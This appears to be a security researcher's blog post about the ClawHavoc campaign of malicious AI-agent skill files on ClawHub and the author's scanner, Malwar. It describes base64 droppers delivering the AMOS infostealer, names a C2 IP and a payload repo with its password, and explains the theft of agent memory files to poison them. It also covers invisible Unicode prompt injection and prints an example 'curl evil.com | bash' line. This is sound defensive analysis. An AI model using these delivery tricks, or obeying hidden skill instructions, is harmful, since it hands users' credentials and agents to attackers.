12% of AI Agent Skills Are Malicious — Here's the Data¶

Line 17 of a ClawHub skill called "clawhub":

That's a dropper. 91.92.242.30 is a C2 server. The skill had professional documentation, install instructions, CI/CD examples, a troubleshooting section. 480 lines of perfectly normal-looking Markdown. And line 17 downloads malware.
I ran it through VirusTotal. Nothing. Semgrep. Nothing. YARA. Nothing.
Because it's not code. It's a Markdown file.
I was auditing skill files for a security project when I found this. The skill was impersonating the ClawHub CLI tool — the package manager for AI agent skills. The "Prerequisites" section had separate install steps for macOS and Windows. The macOS step was the base64 dropper above. The Windows step pointed to a password-protected zip on GitHub: denboss99/openclaw-core, password openclaw. Same payload, different delivery.
Nobody in my toolkit saw it. That's when I started building Malwar.

Two campaigns attributed. The base64 decoded. The C2 identified. All from the rule engine and threat intel layer — no LLM, no network calls, no API keys.
The rule engine is the part that matters. 26 rules, runs in under 50ms, fully offline. It catches base64 payloads piped to shells, obfuscated curl/wget commands, credential harvesting patterns, exfiltration via POST requests, suspicious binary downloads in prerequisite sections, and invisible Unicode characters used for prompt injection. That's the layer you put in CI. Everything else is optional.
The threat intel layer is what turns "this is bad" into "this is ClawHavoc, campaign active since January 27, AMOS infostealer, here's the C2 infrastructure." Adds less than 100ms. I seeded it with every IOC from the Snyk and Termdock reports.
There's also an LLM layer and a URL crawler. They handle the long tail. Most of the time I don't need them.
The campaign¶
Snyk's audit found 341 malicious skills out of 2,857 on ClawHub. 12%. Three days of uploads — January 27 to 29, 2026 — targeting 300,000 users. By February, Termdock counted 824+ across 10,700+ listings.
All 335 AMOS-delivering skills shared one C2 IP: 91.92.242.30. One infrastructure. Hundreds of skills. Nobody noticed for three days.
AMOS goes after the usual targets — wallet keys, exchange API keys, SSH credentials, browser passwords. But the part I keep thinking about: it targets SOUL.md and MEMORY.md. The agent's memory files. Steal those and you can poison the AI's long-term behavior. That's not credential theft. That's a persistent backdoor in someone's digital assistant, and it survives restarts, reinstalls, everything short of wiping the memory files manually.
The one that uses invisible characters¶
snyk_ascii_smuggling.md is different from the others. Line 8 looks empty. It's not.
171 characters in the U+E0000 range — invisible tag characters. They spell out instructions that only the AI model can read. The hidden text tells the agent to respond with "Calculating your testing coverage score" and then run open -a Calculator.
A proof of concept. But the technique doesn't care what the hidden instruction says. It could be curl -s http://evil.com/steal.sh | bash and no human reviewer would see it. The line looks blank.

Every one of them looks like a normal skill if you're skimming. Professional formatting. Real-sounding feature descriptions. The malicious payload is always in a "Prerequisites" or "Important" section — the part your eye skips over because it looks like boilerplate.
What's missing from the ecosystem¶
The AgentSkills spec works across Claude Code, Cursor, GitHub Copilot. Skill files are the new package.json. Except package.json has npm audit, has Snyk, has Socket, has a decade of supply chain security tooling. Skill files have nothing. No registry scanning. No install-time checks. No CI integration. The entire ecosystem is trusting natural language instructions from strangers on the internet.
ClawHavoc used a single shared C2 IP across 335 skills. That's amateur hour. The next campaign will use unique infrastructure per skill, and it won't take three days to notice — it'll take months.
